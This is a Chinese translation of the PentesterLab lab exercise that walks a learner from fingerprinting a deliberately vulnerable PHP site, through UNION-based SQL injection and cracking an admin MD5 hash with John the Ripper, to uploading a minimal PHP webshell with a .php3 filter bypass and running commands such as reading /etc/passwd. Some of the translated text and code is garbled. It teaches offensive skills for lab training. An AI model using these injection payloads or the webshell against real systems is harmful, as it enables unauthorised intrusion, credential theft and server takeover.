从SQL注入到脚本

翻译：https://pentesterlab.com/exercises/from_sqli_to_shell/course

本练习解释如何通过SQL注入访问管理控制台，然后在管理控制台中，解释如何在系统上运行命令。

介绍

本课程详细介绍了在基于PHP的网站中利用SQL注入进行攻击的情况，以及攻击者如何使用SQL注入访问管理页面。

然后，使用此访问权限，攻击者将能够在服务器上执行代码。

攻击分为3个步骤：

1.指纹识别：收集有关web应用程序和使用中的技术的信息。

2.SQL注入的检测和利用：在这一部分中，您将了解SQL注入是如何工作的，以及如何利用它们来检索信息。

3.访问管理页面和代码执行：访问操作系统和运行命令的最后一步。

指纹识别

可以使用多种工具进行指纹识别。首先，通过使用浏览器，可以检测到应用程序是用PHP编写的。

检查HTTP标头

通过使用netcat或telnet连接到web应用程序，可以检索大量信息：

$ telnet vulnerable 80

其中：

• vulnerable是服务器的主机名或IP地址；
• 80是web应用程序使用的TCP端口（80是HTTP的默认值）。

通过发送以下HTTP请求：

GET / HTTP/1.1
Host: vulnerable

只需观察服务器返回的HTTP头，就可以检索有关PHP版本和所用web服务器的信息

HTTP/1.1 200 OK
Date: Thu, 24 Nov 2011 04:40:51 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze3
Vary: Accept-Encoding
Content-Length: 1335
Content-Type: text/html

在这里，应用程序仅通过HTTP可用（端口443上没有运行任何内容）。如果应用程序仅通过HTTPs可用，telnet或netcat将无法与服务器通信，则可以使用openssl工具：

$ openssl s_client -connect vulnerable:443

其中：

• vulnerable是服务器的主机名或IP地址；
• 443是web应用程序使用的TCP端口（443是HTTPs的默认值）

使用Burp Suite等应用程序http://portswigger.net/设置为代理可以轻松检索相同的信息：

使用目录拦截器

工具wfuzz(http://www.edge-security.com/wfuzz.php)可以使用蛮力检测web服务器上的目录和页面。可以运行以下命令来检测远程文件和目录：

$ python wfuzz.py -c -z file,wordlist/general/big.txt --hc 404 http://vulnerable/FUZZ

使用以下选项：

-c输出颜色。

-z文件，字列表/常规/大。txt告诉wfuzz使用wordlist/general/big文件。

txt作为字典来强制远程目录的名称。

--如果响应代码为404（未找到页面），hc 404告诉wfuzz忽略响应

http://vulnerable/FUZZ告诉wfuzz用字典中找到的每个值替换URL中的FUZZ一词。

Wfuzz还可用于检测服务器上的PHP脚本：

$ python wfuzz.py -z file -f commons.txt --hc 404 http://vulnerable/FUZZ.php

SQL注入的检测与利用

SQL注入检测

SQL简介

为了理解、检测和利用SQL注入，您需要了解结构化查询语言（SQL）。SQL允许开发人员执行以下请求：

• 使用SELECT语句检索信息；
• 使用UPDATE语句更新信息；
• 使用INSERT语句添加新信息；
• 使用DELETE语句删除信息。

更多操作（创建/删除/修改表、数据库或触发器）可用，但不太可能在web应用程序中使用。

网站最常用的查询是SELECT语句，用于从数据库中检索信息。SELECT语句遵循以下语法：

SELECT column1, column2, column3 FROM table1 WHERE column4='string1'  AND column5=integer1 AND column6=integer2;

在此查询中，将向数据库提供以下信息：

• SELECT语句指示要执行的操作：检索信息；
• 列列表指示所需的列；
• FROM table1指示从哪些表中提取记录；
• WHERE语句后面的条件用于指示记录应满足的条件。

string1值由一个简单的引号分隔，整数integer1和integer2可以由一个简单的引号（integer2）分隔，也可以直接放入查询中（integer1）。

例如，让我们看看请求是什么：

SELECT column1, column2, column3 FROM table1 WHERE column4='user'  AND column5=3 AND column6=4；

将从下表中检索：

使用前面的查询，将检索以下结果：

如我们所见，只返回这些值，因为它们是唯一匹配WHERE语句中所有条件的值。

如果您阅读了处理某些数据库的源代码，您经常会看到SELECT * FROM tablename。*是一个通配符，要求数据库返回所有列，避免需要对所有列进行命名。

基于整数的检测

由于会显示错误消息，因此很容易检测到网站中的任何漏洞。可以使用以下任何和所有方法检测SQL注入。

所有这些方法都基于数据库的一般行为，发现和利用SQL注入取决于许多不同的因素，尽管这些方法本身并不是百分之百可靠的。这就是为什么您可能需要尝试其中几个，以确保给定的参数易受攻击。

让我们以一个购物网站为例，在访问URL /cat.php?id=1，您将看到图片article1。下表显示了不同id值的情况：

PHP 对应的代码是：

<%?
       $id = $_GET["id"];
       $result= mysql_query("SELECT * FROM articles WHERE id=".$id);
       $row = mysql_fetch_assoc($result);
       // ... display of an article from the query result ...
?>

用户提供的值（`$_GET["id]`）直接在SQL请求中回显。例如，访问URL: * `/article.php?id=1`将生成以下请求：'SELECT * FROM articles WHERE id=1` * `/article.php?id=2`将生成以下请求'SELECT * FROM articles WHERE id=2`如果用户尝试访问URL'/article.php?id=2''，将执行以下请求' SELECT * FROM articles WHERE id=2''。但是，由于单引号''，此SQL请求的语法不正确，数据库将抛出错误。例如，MySQL将抛出以下错误消息：

You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server
version for the right syntax to use near
''' at line 1

此错误消息在HTTP响应中可能可见，也可能不可见，具体取决于PHP配置。

URL中提供的值直接在请求中回显，并被视为整数，这允许您请求数据库为您执行基本的数学运算：

• 如果您尝试访问/article.php?id=2-1，将向数据库发送以下请求SELECT * FROM articles WHERE id=2-1，并且由于上一个查询相当于（数据库将自动执行减法），SELECT * FROM articles WHERE id=1因此article1的信息将显示在网页中。
• 如果尝试访问/article.php?id=2-0，将向数据库发送以下请求SELECT * FROM articlesWHERE id=2-0，并且由于上一个查询相当于SELECT * FROM articles WHERE id=2，因此第2条的信息将显示在网页中。 这些属性提供了一种检测SQL注入的好方法
• 如果访问/article.php?id=2-1显示article1和通过/article.php?id=2-0显示article2，减法由数据库执行，您可能已经找到了SQL注入。
• 如果访问/article.php?id=2-1显示article2和通过/article.php?id=2-0也显示了article2，不太可能对整数进行SQL注入，但可以对字符串值进行SQL注入，我们将看到这一点。
• 如果在URL（/article.php?id=1'）中添加了引号，则应该会收到一个错误。

字符串检测

正如我们在前面的"SQL简介"中所看到的，SQL查询中的字符串在用作值时放在引号之间（例如"test"）：

SELECT id,name FROM users where name='test';

如果网页中存在SQL注入，则注入单个引号将破坏查询语法并生成错误。此外，将一个引号''插入2次将不再中断查询。一般来说，奇数个单引号会引发错误，偶数个单引号不会引发错误。

还可以注释掉查询的结尾，因此在大多数情况下不会出现错误（取决于查询格式）。要注释掉查询的结尾，可以使用'-'。

例如，在测试值中包含注入点的查询：

SELECT id,name FROM users where name='test' and id=3;

将成为：

SELECT id,name FROM users where name='test' -- ' and id=3;

并将被解释为：

SELECT id,name FROM users where name='test'

但是，如果查询遵循以下模式，此测试仍会生成错误：

SELECT id,name FROM users where ( name='test' and id=3 );

因为一旦查询结束被注释掉，右括号就会丢失。显然，您可以尝试使用一个或多个括号来查找不会产生错误的值。

另一种测试方法是使用"and"和"1"="1"，这种注入不太可能影响查询，因为它不太可能破坏查询。例如，如果在前面的查询中注入，我们可以看到语法仍然正确：

SELECT id,name FROM users where ( name='test' and '1'='1' and id=3 );

此外，"and"和"1"="1"不太可能影响请求的语义，有无注入的结果可能相同。然后，我们可以将其与使用以下注入生成的页面进行比较，并且"1"="0"不太可能创建错误，但可能会更改查询的语义。

SQL注入不是一门精确的科学，很多事情都会影响测试结果。如果您认为发生了什么事情，请继续进行注入，并尝试找出代码对您的注入所做的操作，以确保它是SQL注入。

为了找到SQL注入，您需要访问该网站，并在每个页面的所有参数上尝试这些方法。找到SQL注入后，可以转到下一节学习如何利用它。

利用SQL注入

现在，我们在页面中找到了一个SQL注入http://vulnerable/cat.php，为了更进一步，我们需要利用它来检索信息。为此，我们需要了解SQL中可用的UNION关键字。

UNION关键字

UNION语句用于汇集来自两个请求的信息：

SELECT * FROM articles WHERE id=3 UNION SELECT ...

由于它用于从其他表检索信息，因此可以将其用作SQL注入负载。攻击者无法直接修改查询的开头，因为它是由PHP代码生成的。但是，通过使用UNION，攻击者可以操纵查询结束并从其他表检索信息：

SELECT id,name,price FROM articles WHERE id=3 UNION SELECT id,login,password FROM users

最重要的规则是，两条语句都应返回相同的列数，否则数据库将触发错误。

使用UNION开发SQL注入

使用UNION开发SQL注入的步骤如下：

1. 查找要执行并集的列数
2. 查找页面中回显的列
3. 从数据库元表中检索信息
4. 从其他表/数据库检索信息

为了通过SQL注入执行请求，需要找到查询第一部分返回的列数。除非你有应用程序的源代码，否则你必须猜测这个数字。

有两种方法可以获取此信息：

• 使用UNION SELECT并增加列数；
• 使用ORDER BY语句。

如果尝试进行联合，并且两个查询返回的列数不同，则数据库将抛出错误：

The used SELECT statements have a different number of columns

可以使用此属性猜测列数。例如，如果可以插入以下查询：

SELECT id,name,price FROM articles where id=1.

您将尝试以下步骤：

• SELECT id,name,price FROM articles where id=1 UNION SELECT 1，

注入1 UNION SELECT 1将返回错误，因为查询的两个子部分中的列数不同；

• SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2，

出于与上述相同的原因，有效负载1 UNION SELECT 1,2 将返回错误；SELECTid,name,price FROM articles where id=1 UNION SELECT 1,2,3，

因为两个子部分的列数相同，所以此查询不会引发错误。您甚至可以在页面或页面源代码中看到其中一个数字。

注意：这适用于MySQL。其他数据库的方法不同，值为1、2、3…，应更改为null、null、null…对于在UNION关键字的两侧需要相同类型值的数据库。对于Oracle，当使用SELECT时，需要使用关键字FROM，可以使用dual表来完成请求：

UNION SELECT null、null、null FROM dual

另一个方法使用关键字ORDER BY。ORDER BY主要用于告诉数据库应该使用哪个列对结果进行排序：

SELECT firstname,lastname,age,groups FROM users ORDER BY firstname

上面的请求将返回按firstname列排序的用户。

ORDER BY还可以用于与整数一起使用，以告知数据库按列号X排序：

SELECT firstname,lastname,age,groups FROM users ORDER BY 3

上面的请求将返回按第三列排序的用户。

此功能可用于检测列数，如果ORDER BY语句中的列数大于查询中的列数，则会引发错误（例如10）：

Unknown column '10' in 'order clause'

可以使用此属性猜测列数。例如，如果可以插入以下查询：SELECT id,name,price FROM articles where id=1；

您可以尝试以下步骤：

• SELECT id,name,price FROM articles where id=1 ORDER BY 5注入1 ORDER BY 5将返回错误，因为查询的第一部分中的列数小于5；
• SELECT id,name,price FROM articles where id=1 ORDER BY 3注入1 ORDER BY 3不会返回错误，因为查询的第一部分中的列数小于或等于3；
• SELECT id,name,price FROM articles where id=1 ORDER BY 4注入ORDER BY 4将返回错误，因为查询的第一部分中的列数小于4；

基于这种二分法搜索，我们知道列数为3，现在可以使用此信息构建最终查询：SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3即使此方法为本例提供了相同数量的请求，但只要列数增加，它的速度就会显著加快。

正在检索信息

现在我们知道了列的数量，可以从数据库中检索信息了。根据我们收到的错误消息，我们知道使用的后端数据库是MySQL。

使用此信息，我们可以强制数据库执行功能或向我们发送信息：

PHP应用程序使用current_user()连接到数据库的用户

使用version()的数据库版本

为了执行此操作，我们需要将前面语句（UNION SELECT 1,2,3）中的一个值替换为要运行的函数，以便在响应中检索结果。

例如，您可以访问以下URL来检索此信息:

• 数据库版本:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4
• 当前用户:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4
• 当前数据库:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4

我们现在可以从数据库中检索信息并检索任意内容。为了检索与当前应用程序相关的信息，我们需要：

• 当前数据库中所有表的名称
• 要从中检索信息的表的列名称

MySQL提供的表包含自MySQL版本5以来可用的数据库、表和列的元信息。我们将使用这些表来检索构建最终请求所需的信息。这些表存储在information_schema中。

以下查询可用于检索：

• 所有表的列表：SELECT table_name FROM information_schema.table；
• 所有列的列表：SELECT column_name FROM information_schema.columns；

通过混合使用这些查询和以前的URL，您可以猜测要访问哪个页面来检索信息：

表格列表：1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables

列列表：1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns

问题是这些请求为您提供了所有表和列的原始列表，但要查询数据库并检索有趣的信息，您需要知道哪些列属于哪个表。希望是表information_schema.columns。列存储表名：

SELECT table_name,column_name FROM information_schema.columns

要检索此信息，我们可以

将tablename和columnname放在注入的不同部分：1 UNION SELECT 1, table_name, column_name,4 FROM information_schema.columns

使用关键字CONCAT:1 UNION SELECT 1,concat(table_name,':', column_name),3,4 FROM information_schema.columns. ':'

将tablename和columnname连接在注入的同一部分中，以便能够轻松拆分查询结果。

SQL注入提供了与应用程序用于连接到数据库的用户(current_user())...相同的访问级别这就是为什么在部署web应用程序时，为该用户提供尽可能最低的权限总是很重要的原因。

访问管理页面和代码执行破解密码

可以使用两种不同的方法轻松破解密码：

• 搜索引擎
• 开膛手约翰 http://www.openwall.com/john/

当一个散列是不加盐的，它可以很容易地用谷歌这样的搜索引擎破解。为此，只需搜索哈希，您就会看到许多网站上都有您密码的明文版本：

John The Ripper可用于破解此密码，大多数现代Linux发行版都包含John的一个版本，为了破解此密码，您需要告诉John使用了什么算法对其进行加密。对于web应用程序，一个很好的猜测是MD5。

在大多数Linux发行版中，John the Ripper提供的版本只支持少量格式。您可以不带任何参数运行john，从使用信息中获取受支持格式的列表。例如，在Fedora上，支持以下格式：

$ john
# ...usage information...
--format=NAME  force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/crypt
# ...usage information...

遗憾的是，可用的MD5不是PHP函数MD5创建的格式。为了破解此密码，我们需要一个支持raw-md5的John版本。主网站上提供的社区增强版支持raw-md5，可以使用。

现在，我们需要以正确的格式为John提供信息，我们需要将用户名和密码放在同一行上，并用冒号 ':'分隔。

admin:8efe310f9ab3efeae8d410a8e0166eb2

可以使用以下命令行破解以前检索到的密码：

$ ./john password --format=raw-md5  --wordlist=dico --rules

使用以下选项：

• password告诉john哪个文件包含密码哈希
• --format=raw-md5告诉john密码哈希是raw-md5格式
• --wordlist=dico告诉john将dico文件用作字典
• --rules告诉john为提供的每个单词尝试变体

John输出与所用格式匹配的哈希数：

Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])

这表明使用了正确的格式。

您可以快速检索密码：

$ ./john password --format=raw-md5  --wordlist=dico --rules
Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])
P4ssw0rd         (admin)

上载Webshell和代码执行

一旦获得对管理页面的访问权限，下一个目标就是找到在操作系统上执行命令的方法。

我们可以看到，有一个文件上传功能允许用户上传图片，我们可以使用此功能尝试上传PHP脚本。这个PHP脚本一旦上传到服务器上，将为我们提供一种运行PHP代码和命令的方法。

首先，我们需要创建一个PHP脚本来运行命令。下面是一个简单且最小的webshell的源代码：

 <?
  system($_GET['cmd']);
?>

此脚本获取参数cmd的内容并执行它。它需要保存为扩展名为的file.php，例如：shell.php可用作文件名。

我们现在可以使用页面上提供的上载功能：http://vulnerable/admin/new.php并尝试上载此脚本。

我们可以看到，脚本没有正确上传到服务器上。应用程序阻止扩展名为的文件。要上载的php。但是，我们可以尝试：

.php3将绕过一个简单的过滤器.php

.php。将绕过简单过滤器的测试.php和Apache仍将使用.php，因为在此配置中，它没有用于的处理程序.test

现在，我们需要找到管理上传的PHP脚本将文件放在web服务器上的位置。我们需要确保该文件可直接用于web客户端。我们可以访问新上传图像的网页，查看<img标记指向的位置：< span=""></img标记指向的位置：<>

<divclass="content">
        <h2>Lastpicture: Test shell</h2>
       
        <divalign="center">
          <p>
            <img src="admin/uploads/shell.php3"alt="Test shell" /> </p>
        </div>
     </div>

现在，您可以访问以下地址的页面，并开始使用cmd参数运行命令。例如，访问http://vulnerable/admin/uploads/shell.php3?cmd=uname将在操作系统上运行uname命令并返回当前内核（Linux）。

其他命令可用于检索更多信息：

• cat/etc/passwd获取系统用户的完整列表；
• uname -a获取当前内核的版本；
• ls获取当前目录的内容；
• …

webshell与运行PHP脚本的web服务器具有相同的权限，例如，您将无法检索文件/etc/shadow的内容，因为web服务器无权访问此文件（但是，您仍应尝试，以防管理员出错并更改了此文件的权限）。

每个命令都独立于前一个命令在全新的上下文中运行，您将无法通过运行/etc/shadow和ls来获取/etc/目录的内容.

结论

本练习向您展示了如何手动检测和利用SQL注入来访问管理页面。一旦进入“受信任区域”，通常会有更多的功能可用，这可能会导致更多的漏洞。

此练习基于几年前在一个网站上进行的渗透测试的结果，但具有此类漏洞的网站今天仍然可以在互联网上找到。

所提供的web服务器的配置是一种理想的情况，因为会显示错误消息，并且关闭PHP保护。我们将在另一个练习中看到如何在更困难的条件下利用SQL注入，但与此同时，您可以使用PHP配置来强化练习。为此，您需要启用magic_quotes_gpc并禁用PHP配置中的display_errors错误（/etc/php5/apache2/php.ini），然后重新启动web服务器（/etc/init.d/apache2 restart）